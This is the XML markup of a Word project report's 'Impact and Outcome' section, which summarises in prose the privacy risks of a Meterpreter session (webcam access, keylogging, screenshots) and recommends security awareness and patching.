          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>IMPACT AND OUTCOME OF THE PROJECT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4702EB48" w14:textId="47E3EB77" w:rsidR="004B6B21" w:rsidRDefault="004B6B21" w:rsidP="000900A4">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>IMPACT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCD0036" w14:textId="4C58C0FB" w:rsidR="004B6B21" w:rsidRDefault="004B6B21" w:rsidP="004B6B21">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The impact of the normal shell is itself dangerous.It gives so much options to invade the privacy of an individual,especially if it is a meterpreter session.Meterpreter session comes with a set of commands.</w:t>
      </w:r>
      <w:r w:rsidR="008952D2">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>We have commands to upload and download files.We have command to open victim’s webcam,capturing keystrokes,capturing mouse click,taking screenshot of victim’s screen,playing an audio into victim’s machine etc.If security awareness is less among an individual then,his/her privacy will be lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37443A2E" w14:textId="261E5E2A" w:rsidR="008952D2" w:rsidRDefault="008952D2" w:rsidP="008952D2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004421B4">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OUTCOME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E89B53" w14:textId="09C2C9B2" w:rsidR="008105E1" w:rsidRPr="004421B4" w:rsidRDefault="004421B4" w:rsidP="008105E1">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The main outcome of the project is to increase the security awareness among the individual as well as organizations.After going though all this ,individuals as well as organization should take care of privacy setting of the system/domain.Also they should not click on suspicious links sent by </w:t>
      </w:r>
      <w:r w:rsidR="008105E1">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>unknow persons.Further it is also important to make updates that comes occasionally in the system.Those updates basically patches the security bugs for initial foothold and also privilege escalation vectors if present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D558365" w14:textId="21B6D71B" w:rsidR="008952D2" w:rsidRPr="004421B4" w:rsidRDefault="008952D2" w:rsidP="008952D2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F02EDC" w14:textId="6827CB6E" w:rsidR="008952D2" w:rsidRPr="008952D2" w:rsidRDefault="008952D2" w:rsidP="008952D2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0791E3" w14:textId="77777777" w:rsidR="004B6B21" w:rsidRPr="004B6B21" w:rsidRDefault="004B6B21" w:rsidP="004B6B21">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="104139A4" w14:textId="73DB5AD2" w:rsidR="004B6B21" w:rsidRPr="004B6B21" w:rsidRDefault="004B6B21" w:rsidP="000900A4">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="105F49F2" w14:textId="77777777" w:rsidR="00B35ED0" w:rsidRPr="00A62FAA" w:rsidRDefault="00B35ED0" w:rsidP="00A2543E">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67922D33" w14:textId="77777777" w:rsidR="00A63E63" w:rsidRPr="00A63E63" w:rsidRDefault="00A63E63" w:rsidP="00A63E63">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34814455" w14:textId="5E274A31" w:rsidR="007E0B97" w:rsidRDefault="007E0B97" w:rsidP="007E0B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2456276C" w14:textId="18332A1C" w:rsidR="007E0B97" w:rsidRDefault="007E0B97" w:rsidP="007E0B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE33FC5" w14:textId="77777777" w:rsidR="007E0B97" w:rsidRPr="007E0B97" w:rsidRDefault="007E0B97" w:rsidP="007E0B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Brush Script MT" w:hAnsi="Brush Script MT"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A31ED4C" w14:textId="69976B95" w:rsidR="00D13AAE" w:rsidRDefault="00D13AAE" w:rsidP="007E0B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FC02B2C" w14:textId="77777777" w:rsidR="00D13AAE" w:rsidRPr="007C5290" w:rsidRDefault="00D13AAE" w:rsidP="007C5290">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D13AAE" w:rsidRPr="007C5290">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EA85" w14:textId="77777777" w:rsidR="00F02D61" w:rsidRDefault="00F02D61" w:rsidP="00034CC0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="01CE78BB" w14:textId="77777777" w:rsidR="00F02D61" w:rsidRDefault="00F02D61" w:rsidP="0003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regular">
    <w:altName w:val="Cambria"/>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FF8E" w14:textId="5DF072D9" w:rsidR="00D5045D" w:rsidRDefault="00D5045D" w:rsidP="00D5045D">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6C72E092" wp14:editId="52662A38">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-904875</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-296545</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7762875" cy="923925"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapThrough wrapText="bothSides">
            <wp:wrapPolygon edited="0">
              <wp:start x="0" y="0"/>
              <wp:lineTo x="0" y="21377"/>
              <wp:lineTo x="21573" y="21377"/>
              <wp:lineTo x="21573"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875" cy="923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BEC6" w14:textId="77777777" w:rsidR="00F02D61" w:rsidRDefault="00F02D61" w:rsidP="00034CC0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="04F3E191" w14:textId="77777777" w:rsidR="00F02D61" w:rsidRDefault="00F02D61" w:rsidP="00034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2D97" w14:textId="0993F7D8" w:rsidR="00BB1D19" w:rsidRDefault="00BB1D19">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C97DF01" wp14:editId="3170EA26">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-904875</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-457200</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7762875" cy="91059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875" cy="910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33E7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7F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3F0F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DEF8535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2F21452D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="219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946E1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C6E86A3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5AA706AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C84EDB9E"/>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EC295D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9AA4050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9">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902F7A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D44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BA0C36"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="32EC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093392">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="499741206">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="290718810">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="413009943">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="572275228">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="897475271">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2034842132">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1905532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C0"/>
    <w:rsid w:val="00034CC0"/>
    <w:rsid w:val="00071824"/>
    <w:rsid w:val="00084883"/>
    <w:rsid w:val="000900A4"/>
    <w:rsid w:val="0009148B"/>
    <w:rsid w:val="000A6A53"/>
    <w:rsid w:val="0010320B"/>
    <w:rsid w:val="00107FA9"/>
    <w:rsid w:val="001242B7"/>
    <w:rsid w:val="0015548B"/>
    <w:rsid w:val="00177E38"/>
    <w:rsid w:val="002B1E89"/>
    <w:rsid w:val="002B6593"/>
    <w:rsid w:val="002D49E9"/>
    <w:rsid w:val="002E2433"/>
    <w:rsid w:val="002F2DCE"/>
    <w:rsid w:val="0030443F"/>
    <w:rsid w:val="00306859"/>
    <w:rsid w:val="003101D9"/>
    <w:rsid w:val="0031080E"/>
    <w:rsid w:val="00310D29"/>
    <w:rsid w:val="00372661"/>
    <w:rsid w:val="00392AC0"/>
    <w:rsid w:val="003C5AFF"/>
    <w:rsid w:val="003D3F7A"/>
    <w:rsid w:val="00414BAA"/>
    <w:rsid w:val="004421B4"/>
    <w:rsid w:val="00450257"/>
    <w:rsid w:val="004607B4"/>
    <w:rsid w:val="00467F76"/>
    <w:rsid w:val="00486019"/>
    <w:rsid w:val="004A16CE"/>
    <w:rsid w:val="004B6B21"/>
    <w:rsid w:val="004F49A7"/>
    <w:rsid w:val="00512A6C"/>
    <w:rsid w:val="0051421E"/>
    <w:rsid w:val="005303DF"/>
    <w:rsid w:val="00602FE1"/>
    <w:rsid w:val="00640314"/>
    <w:rsid w:val="006730E0"/>
    <w:rsid w:val="006A23A0"/>
    <w:rsid w:val="00735588"/>
    <w:rsid w:val="00736C61"/>
    <w:rsid w:val="007C5290"/>
    <w:rsid w:val="007E0B97"/>
    <w:rsid w:val="008105E1"/>
    <w:rsid w:val="00826B86"/>
    <w:rsid w:val="008952D2"/>
    <w:rsid w:val="008B0E01"/>
    <w:rsid w:val="008B770D"/>
    <w:rsid w:val="009134FA"/>
    <w:rsid w:val="00933B4C"/>
    <w:rsid w:val="009968C4"/>
    <w:rsid w:val="009E0069"/>
    <w:rsid w:val="009E3717"/>
    <w:rsid w:val="00A2543E"/>
    <w:rsid w:val="00A40BD5"/>
    <w:rsid w:val="00A47E3C"/>
    <w:rsid w:val="00A62FAA"/>
    <w:rsid w:val="00A63E63"/>
    <w:rsid w:val="00A65DF0"/>
    <w:rsid w:val="00A65F61"/>
    <w:rsid w:val="00A743C7"/>
    <w:rsid w:val="00AA6D69"/>
    <w:rsid w:val="00B277C5"/>
    <w:rsid w:val="00B35ED0"/>
    <w:rsid w:val="00B55322"/>
    <w:rsid w:val="00BB1D19"/>
    <w:rsid w:val="00BF73E6"/>
    <w:rsid w:val="00C51E8E"/>
    <w:rsid w:val="00C72925"/>
    <w:rsid w:val="00CF5361"/>
    <w:rsid w:val="00D13AAE"/>
    <w:rsid w:val="00D15D28"/>
    <w:rsid w:val="00D47219"/>
    <w:rsid w:val="00D5045D"/>
    <w:rsid w:val="00D96BB2"/>
    <w:rsid w:val="00DA58D7"/>
    <w:rsid w:val="00DB2FD1"/>
    <w:rsid w:val="00DC00ED"/>
    <w:rsid w:val="00E17944"/>
    <w:rsid w:val="00E24DBF"/>
    <w:rsid w:val="00E4429B"/>
    <w:rsid w:val="00EA6C13"/>
    <w:rsid w:val="00F02D61"/>
    <w:rsid w:val="00F76D68"/>
    <w:rsid w:val="00FD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ACD4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{48AE9941-853E-4C20-B55E-A3678927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CC0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00034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CC0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00BB1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611F-FBE0-4621-B1C9-13FC9CE1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ion Team</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sabyasachi Banerjee</cp:lastModifiedBy>
  <cp:revision>28</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-11T08:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-13T11:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>